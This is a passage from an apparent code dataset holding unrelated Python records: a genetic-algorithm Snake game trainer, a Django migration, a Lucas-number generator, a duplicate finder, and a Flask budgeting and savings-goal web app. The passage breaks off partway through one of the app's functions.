"step-4": "import random\nimport sys\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation\nfrom snake_game import Snake\nfrom snake_game import Fruit\nimport pygame\nfrom pygame.locals import *\ntotal_models = 50\ncurrent_pool = []\nfitness = []\ngeneration = 264\nsave = 0\nsave_location = 'Saved_Models/model'\nload = 1\nload_location = 'Saved_Models-better/model'\nWIDTH = 480\nHEIGHT = 480\nGRID_D = 12\nBLOCK_W = WIDTH / GRID_D\nBLOCK_H = HEIGHT / GRID_D\nMAX_MOVES = 150\nscore = []\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\ndef model_crossover(parent_1, parent_2):\n \"\"\"\n Produce offspring based on the best parents\n \"\"\"\n global current_pool\n weight1 = current_pool[parent_1].get_weights()\n weight2 = current_pool[parent_2].get_weights()\n new_weight1 = weight1\n new_weight2 = weight2\n gene = random.randint(0, len(new_weight1) - 1)\n new_weight1[gene] = weight2[gene]\n new_weight2[gene] = weight1[gene]\n return np.asarray([new_weight1, new_weight2])\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n 
\"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n total_fitness = sum(fitness)\n for i in range(total_models // 2):\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n new = model_crossover(parent_1, parent_2)\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n generation += 1\n return\n\n\ndef check_if_closer(snake, fruit):\n head = snake.position[0]\n prev = snake.position[1]\n head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] -\n head[1]) ** 2)\n prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] -\n prev[1]) ** 2)\n if head_dis > prev_dis:\n return False\n return True\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 
1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\nif __name__ == '__main__':\n for i in range(total_models):\n model = create_model()\n current_pool.append(model)\n fitness.append(-100)\n score.append(0)\n if load == 1:\n for i in range(total_models):\n current_pool[i].load_weights(load_location + str(i) + 
'.keras')\ntheApp = App()\nwhile True:\n for i in range(total_models):\n fitness[i] = 0\n score[i] = 0\n for i in range(total_models):\n theApp.on_execute(i)\n print('Higest score: ' + str(max(score)) + ' Model: ' + str(score.index\n (max(score))) + ' Gen: ' + str(generation))\n if save == 1:\n save_pool()\n genetic_updates()\n",
"step-5": "import random\nimport sys\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation\n\nfrom snake_game import Snake\nfrom snake_game import Fruit\nimport pygame\nfrom pygame.locals import *\n\n# Neural Network globals\ntotal_models = 50\ncurrent_pool = []\nfitness = []\ngeneration = 264\n\n# 1 if want to save pool, 0 if not\nsave = 0\nsave_location = \"Saved_Models/model\"\nload = 1\nload_location = \"Saved_Models-better/model\"\n\n# Game configurations\nWIDTH = 480\nHEIGHT = 480\nGRID_D = 12\nBLOCK_W = WIDTH / GRID_D\nBLOCK_H = HEIGHT / GRID_D\nMAX_MOVES = 150\nscore = []\n\n# Save models to file\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + \".keras\")\n print(\"Pool saved\")\n\n\ndef create_model():\n '''\n Create Neural Network as a keras model\n '''\n model = Sequential()\n model.add(Dense(12, input_dim = 8, activation = 'relu'))\n model.add(Dense(16, activation = 'relu'))\n model.add(Dense(4, activation = 'sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n\n return model\n\ndef predict_direction(snake, fruit, model_num):\n '''\n This function feeds information into the model, then determines\n which direction the snake should go\n '''\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n\n output = current_pool[model_num].predict(n_input, 1)\n \n return output.argmax()\n\ndef model_crossover(parent_1, parent_2):\n '''\n Produce offspring based on the best parents\n '''\n global current_pool\n\n # Weight of parents\n weight1 = current_pool[parent_1].get_weights()\n weight2 = current_pool[parent_2].get_weights()\n new_weight1 = weight1\n new_weight2 = weight2\n\n # Gene\n gene = random.randint(0, len(new_weight1) - 1)\n\n new_weight1[gene] = weight2[gene]\n 
new_weight2[gene] = weight1[gene]\n return np.asarray([new_weight1, new_weight2])\n\ndef model_mutate(weights):\n '''\n Mutate the weights of a model\n '''\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if (random.uniform(0, 1) > .7):\n change = random.uniform(-.5,.5)\n weights[i][j] += change\n \n return weights\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n\n # Calculate total fitness\n total_fitness = sum(fitness)\n \n # Breeding time\n for i in range(total_models // 2):\n # Pick two parents\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n \n # Model crossover between two parents\n new = model_crossover(parent_1, parent_2)\n \n # Mutate models\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n\n # Set new weights, reset fitness\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n\n generation += 1\n return\n\ndef check_if_closer(snake, fruit):\n head = snake.position[0]\n prev = snake.position[1]\n\n # Calculate the heads distance from the fruit, and the previous spot\n # to see if it got closer\n head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] - head[1]) ** 2)\n prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] - prev[1]) ** 2)\n\n if head_dis > prev_dis:\n return False\n return True\n\n\nclass App:\n '''\n Main App for game\n '''\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause 
= False\n self.moves = 0\n self.frames = 11\n \n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n \n def on_event(self, event):\n\n # Quit game\n if event.type == pygame.QUIT:\n self._running = False\n \n # Change direction of snake\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n # Increase speed of game\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n # Decrease speed of game\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n \n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n # Adjust fitness, reset move counter\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n \n if check_if_closer(self.snake, self.fruit):\n # Reward snake for moving towards fruit\n fitness[model_num] += 10\n\n self.moves += 1\n \n def on_render(self, model_num):\n self._display_surf.fill((0,124,0))\n \n # Fill every other space to create a multi color grid\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n\n # Draw sanke and fruit\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption(\"Gen: \" + str(generation) + \" Model: \" + str(model_num) + \" Score: \" + str(self.snake.score) + \" Tick \" + str(self.frames))\n pygame.display.update()\n \n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n \n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n \n while (self._running):\n for event in 
pygame.event.get():\n self.on_event(event)\n \n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n\n # Checks if game is paused\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n\n # Reset when snake dies\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n \n # Print fitness\n print(fitness[i])\n break\n\n # Clean up and print score\n # self.on_cleanup()\n print(int(self.snake.score))\n \nif __name__ == \"__main__\" :\n # Init models\n for i in range(total_models):\n model = create_model()\n current_pool.append(model)\n fitness.append(-100)\n score.append(0)\n\n if load == 1:\n for i in range(total_models):\n current_pool[i].load_weights(load_location + str(i) + \".keras\")\n\ntheApp = App()\nwhile True:\n\n # Reset fitness scores and player scores\n for i in range(total_models):\n fitness[i] = 0\n score[i] = 0\n\n # Play game for each model\n for i in range(total_models): \n theApp.on_execute(i)\n \n # Print high score to screen\n print(\"Higest score: \" + str(max(score)) + \" Model: \" + str(score.index(max(score))) + \" Gen: \" + str(generation))\n \n # Write these values to a file\n # fi = open(\"results.txt\", \"a+\")\n # fi.write(\"Higest score: \" + str(max(score)) + \" Model: \" + str(score.index(max(score))) + \" Gen: \" + str(generation) + \"\\r\\n\")\n # fi.close()\n\n # Save pool\n if save == 1:\n save_pool()\n genetic_updates()",
"step-ids": [
13,
15,
16,
20,
21
]
}
|
[
13,
15,
16,
20,
21
] |
# Generated by Django 3.2.3 on 2021-06-01 07:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``well_status`` choice field to the ``Well`` model."""
    dependencies = [
        ('info', '0002_auto_20210531_1958'),
    ]
    operations = [
        migrations.AddField(
            model_name='well',
            name='well_status',
            # Choice labels are Russian: '0' drilling, '1' development,
            # '2' idle (the default), '3' downtime.
            field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'), ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15, verbose_name='Статус скважины'),
        ),
    ]
|
normal
|
{
"blob_id": "a3239bbe4f85c9f0e1bc845245f024c3feb64923",
"index": 7476,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('info', '0002_auto_20210531_1958')]\n operations = [migrations.AddField(model_name='well', name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'),\n ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15,\n verbose_name='Статус скважины'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('info', '0002_auto_20210531_1958')]\n operations = [migrations.AddField(model_name='well', name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'),\n ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15,\n verbose_name='Статус скважины'))]\n",
"step-5": "# Generated by Django 3.2.3 on 2021-06-01 07:26\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('info', '0002_auto_20210531_1958'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='well',\n name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'), ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15, verbose_name='Статус скважины'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def lucas():
yield 2
a = 2
b = 1
while True:
yield b
a, b = b, a + b
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def lucas():
yield 2
a = 2
b = 1
while True:
yield b
a, b = b, a + b
<|reserved_special_token_0|>
for i in range(10):
print('{}: {}'.format(i, next(l)))
<|reserved_special_token_1|>
def lucas():
    """Generate the Lucas numbers endlessly: 2, 1, 3, 4, 7, 11, 18, ..."""
    prev, curr = 2, 1
    yield prev
    while True:
        yield curr
        prev, curr = curr, prev + curr
l = lucas()
for i in range(10):
print('{}: {}'.format(i, next(l)))
|
flexible
|
{
"blob_id": "4745c00ca0f3ca4316117228a9d44bdb5df02877",
"index": 7799,
"step-1": "<mask token>\n",
"step-2": "def lucas():\n yield 2\n a = 2\n b = 1\n while True:\n yield b\n a, b = b, a + b\n\n\n<mask token>\n",
"step-3": "def lucas():\n yield 2\n a = 2\n b = 1\n while True:\n yield b\n a, b = b, a + b\n\n\n<mask token>\nfor i in range(10):\n print('{}: {}'.format(i, next(l)))\n",
"step-4": "def lucas():\n yield 2\n a = 2\n b = 1\n while True:\n yield b\n a, b = b, a + b\n\n\nl = lucas()\nfor i in range(10):\n print('{}: {}'.format(i, next(l)))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def print_duplicates(arr):
    """Print, space-separated, each element of *arr* that was already seen.

    An element occurring k times is printed k-1 times, in encounter order.
    """
    seen = set()
    for item in arr:
        if item not in seen:
            seen.add(item)
        else:
            print(item, end=' ')
normal
|
{
"blob_id": "420c3944de0a5436a9824604fd6caf27706eb99c",
"index": 4102,
"step-1": "<mask token>\n",
"step-2": "def print_duplicates(arr):\n uniques = set()\n for elem in arr:\n if elem in uniques:\n print(elem, end=' ')\n else:\n uniques.add(elem)\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os, datetime
import urllib
import urllib.request

from flask import (Flask, flash, json, jsonify, redirect, render_template,
                   request, session, url_for)

import util.database as db
# Resolve template/static directories relative to this file so the app can
# be launched from any working directory; the bare-Flask branch covers the
# case where __file__ lives directly in the project root.
template_path=os.path.dirname(__file__)+"/templates"
file=""
if template_path!="/templates":
    app = Flask("__main__",template_folder=os.path.dirname(__file__)+"/templates",static_folder=os.path.dirname(__file__)+"/static")
    file = open(os.path.dirname(__file__)+'/data/keys.json')
else:
    app = Flask("__main__")
    file = open('./data/keys.json')
# Fresh random secret key per process: existing sessions die on restart.
app.secret_key = os.urandom(32)
content = file.read()
keys = json.loads(content)
# has a 5000 calls/day limit
PIXABAY_KEY = keys['Pixabay']
PIXABAY_STUB = "https://pixabay.com/api/?key=" + PIXABAY_KEY + "&q=" #separate words with "+"
@app.route('/')
def home():
    """Landing page.

    Anonymous visitors get the bare template.  Signed-in users get flags
    for whether finance/goal records exist and, when a goal is set, the
    computed progress toward it (the same math as the /goals view).
    """
    if "username" in session:
        # Index 2 of the user row is used as the numeric user id throughout.
        id_num=db.search_user_list(session["username"], is_usrname=True)[0][2]
        finavail=db.search_finance_list(id_num)
        goalavail=db.search_goal_list(id_num)
        if finavail:
            session["finances"]=session["username"]
        if goalavail:
            session["goals"]=session["username"]
        set_goal = db.search_goal_list(id_num)
        print(set_goal)
        if set_goal != []:
            user_id = db.search_user_list(session['username'], is_usrname=True)[0][2]
            g = db.search_goal_list(user_id)
            b = db.search_finance_list(user_id)
            t = db.search_time_list(user_id)
            date_now = datetime.date.today()
            # Goal rows look like (name, price, percent); the aliases below
            # each end up holding one of those fields.
            price = g
            perc = g
            delta_months = 0
            if g != []:
                g = g[0][0]
            if price != []:
                price = price[0][1]
            if perc != []:
                perc = perc[0][2]
            ##function to get difference in months between 2 dates
            def months_between(date1,date2):
                # Whole calendar months elapsed; argument order-insensitive.
                if date1>date2:
                    date1,date2=date2,date1
                m1=date1.year*12+date1.month
                m2=date2.year*12+date2.month
                months=m2-m1
                if date1.day>date2.day:
                    months-=1
                elif date1.day==date2.day:
                    seconds1=date1.hour*3600+date1.minute+date1.second
                    seconds2=date2.hour*3600+date2.minute+date2.second
                    if seconds1>seconds2:
                        months-=1
                return months
            if t != []:
                t = t[0][0]
                # Months elapsed since the stored 'YYYY-MM-DD' start date.
                delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))
            print(delta_months)
            img = db.search_image_list(user_id)
            if img != []:
                img = img[0][0]
            if b != []:
                bal = b[0][0]
                inc = b[0][1]
            print(b)
            print(g)
            print(price)
            print(perc)
            print(img)
            if g or price:
                if b:
                    print("Used the first one")
                    # Progress = months * monthly saving (perc% of income) / price,
                    # clamped to 100%.
                    perc_complete = (delta_months * (perc / 100.0) * inc)/price
                    print(perc_complete)
                    if perc_complete > 1:
                        perc_complete = 1
                    return render_template('home.html',fin=finavail,goal=goalavail, set_goal= set_goal, goal_name =g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )
            return render_template('home.html',fin=finavail,goal=goalavail)
        return render_template('home.html',fin=finavail,goal=goalavail)
    return render_template('home.html')
@app.route('/register')
def register():
    """Render the account-registration form (submits to /auth)."""
    return render_template('register.html')
@app.route('/login')
def login():
    """Render the login form (submits to /auth)."""
    return render_template('login.html')
@app.route('/auth', methods=['POST'])
def auth():
    """Handle both registration and login posts from one endpoint.

    The 'submit' form field distinguishes the two: "Register" creates an
    account (after a password-confirmation check); anything else is a
    login attempt.  On success the username is stored in the session and
    the user is redirected home; failures flash a message and bounce back
    to the relevant form.
    """
    user = request.form.get("user")
    paswrd = request.form.get('pass')
    if request.form.get("submit")=="Register":
        paswrd2 = request.form.get("pass2")
        print(paswrd)
        print(paswrd2)
        if paswrd != paswrd2:
            flash("Passwords Do Not Match")
            return redirect(url_for('register'))
        if db.register(user, paswrd):
            flash("Registered successfully")
            session['username'] = request.form['user']
        else:
            flash("Unable to register the user")
            return redirect(url_for('register'))
            # NOTE(review): unreachable -- placed after the return above.
            print("Username has been registered previously!")
    else:
        # Login path.  NOTE(review): passwords appear to be stored and
        # compared in plain text (match[0][1]) -- confirm/harden.
        match=db.search_user_list(user, is_usrname=True)
        if len(match)>0:
            if match[0][1]==paswrd:
                session["username"]=request.form["user"]
            else:
                flash("wrong Password")
                return redirect(url_for('login'))
        else:
            flash("User not found")
            return redirect(url_for('login'))
    return redirect(url_for('home'))
@app.route('/finances')
def finance():
    """Show the stored balance/income plus daily and monthly expenses.

    Expense and rating rows are (name, value) pairs; totals are plain
    sums of the amounts.  Without a finance record the empty entry form
    is rendered instead.
    """
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    user_id = db.search_user_list(session['username'])[0][2]
    items = db.search_finance_list(user_id)
    daily = db.search_expense_list(user_id, is_id=True)
    monthly = db.search_monthly_list(user_id, is_id=True)
    ratings = db.search_rating_list(user_id, is_id=True)
    print(ratings)
    print(f"Unlike month, this is daily: {daily}\n")
    # Collapse the (name, value) row tuples into plain dicts.
    w = dict([ (x[0], x[1]) for x in daily ])
    s = dict([ (x[0], x[1]) for x in monthly ])
    r = dict([ (x[0], x[1]) for x in ratings ])
    print(f"THIS is monthly: {monthly}")
    print(f"THIS is s: {s}")
    print(f"These are the ratings: {r}")
    total = 0
    m_total = 0
    for x in w.values():
        total += float(x)
    for x in s.values():
        m_total += float(x)
    if items != []:
        bal,income,i = items[0]
        diction = {"Balance":bal, "Income":income}
        return render_template('findata.html',
            diction=diction,
            daily=w,
            months = s,
            total=total,
            mtotal = m_total,completed=True, ratings=r)
    return render_template('findata.html')
@app.route('/fincalc', methods=['POST'])
def calc():
    """Persist the posted finance data (balance, income, expenses, ratings).

    Form payloads 'daily-importance' / 'monthly-importance' and
    'all-inputs' / 'monthly-inputs' are JSON blobs built client-side.
    Also rewrites this user's row in static/ratings.csv and stores
    everything via the db helpers before redirecting home.
    """
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    # print(request.form)
    session["finances"]=session["username"]
    # [1:] strips the leading currency symbol off the posted amounts.
    bal = request.form['balance'][1:]
    monthly = request.form['monthly-inputs']
    income = request.form['income'][1:]
    # print(request.form)
    s = request.form
    d_rates = request.form['daily-importance']
    m_rates = request.form['monthly-importance']
    print(d_rates)
    user_id = db.search_user_list(session['username'])[0][2]
    daily_dict = json.loads(d_rates)
    monthly_dict = json.loads(m_rates)
    print(daily_dict)
    print(monthly_dict)
    dai_im = dict([x for x in daily_dict.values()]) # {expenseName: rating, expenseName2: rating, ...}
    mon_im = dict([x for x in monthly_dict.values()])
    file=os.path.dirname(__file__)+f'/static/ratings.csv'
    # stringg accumulates this user's CSV row: "{'name' : 'rating' ...},id".
    stringg = "{"
    try:
        with open(file) as f: # if readable, file already exists
            print("File found, not creating...")
            f.close()
    except Exception as e:
        print(e)
        with open(file, 'a+') as f: # creates the file
            print("File not found, creating...")
            f.write(f"ratings,id\n")
            f.close()
    for item in mon_im:
        db.add_rating(item, mon_im[item], user_id)
        stringg += "'" + item + "'" + " : " + "'" + str(mon_im[item]) + "'" + " "
    for item in dai_im:
        db.add_rating(item, dai_im[item], user_id)
        stringg += "'" + item + "'" + " : " + "'" + str(dai_im[item]) + "'" + " "
    stringg += "}," + str(user_id) + "\n"
    # Rewrite the CSV, dropping any existing row for this user id before
    # appending the fresh one.  (f.close() inside a with-block is a no-op.)
    with open(file, "r") as f:
        lines = f.readlines()
    with open(file, "w") as f:
        for line in lines:
            if str(user_id) != line.strip("\n").split(",")[1]:
                f.write(line)
        f.write(stringg)
        f.close()
    daily = request.form['all-inputs']
    print(f"This is daily: {monthly}")
    daily = json.loads(daily) # dictionary
    monthly = json.loads(monthly)
    print(f"This is daily now {monthly}")
    w = dict([x for x in daily.values()]) # {expense1: $$$, expense2: $$$, ...}
    m = dict([x for x in monthly.values()])
    print(f"\nThis is calculated m:{m}\n")
    db.add_finances(bal, m, income, w, user_id)
    flash("Finances updated")
    return redirect(url_for('home'))
@app.route('/goals')
def goals():
    """Show the user's savings goal and progress toward it.

    Progress = months elapsed since the stored start date, times the
    monthly saving (perc% of income), divided by the goal price and
    clamped to 100%.  Renders progressively sparser templates when goal
    or finance data is missing.
    """
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    user_id = db.search_user_list(session['username'])[0][2]
    g = db.search_goal_list(user_id)
    b = db.search_finance_list(user_id)
    t = db.search_time_list(user_id)
    date_now = datetime.date.today()
    # Goal rows look like (name, price, percent); unpack each field below.
    price = g
    perc = g
    delta_months = 0
    if g != []:
        g = g[0][0]
    if price != []:
        price = price[0][1]
    if perc != []:
        perc = perc[0][2]
    ##function to get difference in months between 2 dates
    def months_between(date1,date2):
        # Whole calendar months elapsed; argument order-insensitive.
        if date1>date2:
            date1,date2=date2,date1
        m1=date1.year*12+date1.month
        m2=date2.year*12+date2.month
        months=m2-m1
        if date1.day>date2.day:
            months-=1
        elif date1.day==date2.day:
            seconds1=date1.hour*3600+date1.minute+date1.second
            seconds2=date2.hour*3600+date2.minute+date2.second
            if seconds1>seconds2:
                months-=1
        return months
    if t != []:
        t = t[0][0]
        delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))
    print(delta_months)
    img = db.search_image_list(user_id)
    if img != []:
        img = img[0][0]
    if b != []:
        bal = b[0][0]
        inc = b[0][1]
    print(b)
    print(g)
    print(price)
    print(perc)
    print(img)
    if g or price:
        if b:
            print("Used the first one")
            perc_complete = (delta_months * (perc / 100.0) * inc)/price
            print(perc_complete)
            if perc_complete > 1:
                perc_complete = 1
            return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )
        else:
            print("Used the second")
            return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img)
    else:
        if b:
            return render_template('goals.html', bal=bal, income=inc)
        else:
            return render_template('goals.html')
@app.route('/gcalc', methods=['POST'])
def gcalc():
    """Save the posted savings goal and attach a matching Pixabay image.

    Form fields: 'goal' (name), 'goal_price' (leading currency symbol is
    stripped), 'slide' (percent of income to save per month).  Redirects
    home on success, or renders the error page when the image lookup
    fails.  Requires `import urllib.request` at module level: a bare
    `import urllib` does not guarantee the submodule is loaded.
    """
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    goal_name = request.form['goal']
    goal_price = request.form['goal_price'][1:]  # drop the leading '$'
    percentage = request.form['slide']
    user_id = db.search_user_list(session['username'])[0][2]
    db.add_goals(goal_name, goal_price, percentage, user_id)
    cached = db.search_image_list(user_id)
    # Only hit the Pixabay API when no image is cached for this goal name
    # (the key has a 5000 calls/day limit).
    if cached == [] or cached[0][2] != goal_name:
        try:
            resp = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ', '+') + "&image_type=photo")
            payload = json.loads(resp.read())
            img = payload['hits'][0]['webformatURL']
        except Exception:
            # Narrowed from a bare except: covers network errors and an
            # empty 'hits' list, without swallowing KeyboardInterrupt.
            return render_template('error.html', err="Cannot connect to API", fix="Try refreshing or contacting the site owner")
    else:
        img = cached[0][1]
    db.add_images(img, goal_name, user_id)
    flash(f"Goal for {goal_name} at ${goal_price} has been added!")
    return redirect(url_for('home'))
@app.route('/sankey')
def sankey():
    """Render the Sankey-diagram page for the signed-in user."""
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    uid = db.search_user_list(session['username'])[0][2]
    return render_template('sankey.html', idnum=uid)
@app.route('/pie')
def pie():
    """Render the pie-chart page for the signed-in user."""
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    uid = db.search_user_list(session['username'])[0][2]
    return render_template('pie.html', idnum=uid)
@app.route('/area')
def area():
    """Render the area chart of cut-back suggestions.

    Flags expenses whose importance rating is <= 6 and whose yearly cost
    is at least 5% of the goal price; these are passed to the template as
    {name: (rating, fraction_of_goal_price)}.  Redirects to /goals when
    no goal exists yet.
    """
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    user_id = db.search_user_list(session['username'])[0][2]
    goal=db.search_goal_list(user_id)
    if goal == []:
        return redirect(url_for('goals'))
    daily=db.search_expense_list(user_id)
    monthly=db.search_monthly_list(user_id)
    dadict={}
    modict={}
    print(goal)
    ratings={}
    for names in daily:
        dadict[names[0]]=names[1]
    for names in monthly:
        modict[names[0]]=names[1]
    print(dadict,modict)
    percent=0
    for names in db.search_rating_list(user_id):
        print(names)
        # Yearly cost as a fraction of the goal price: monthly*12, daily*30*12.
        if names[0] in modict:
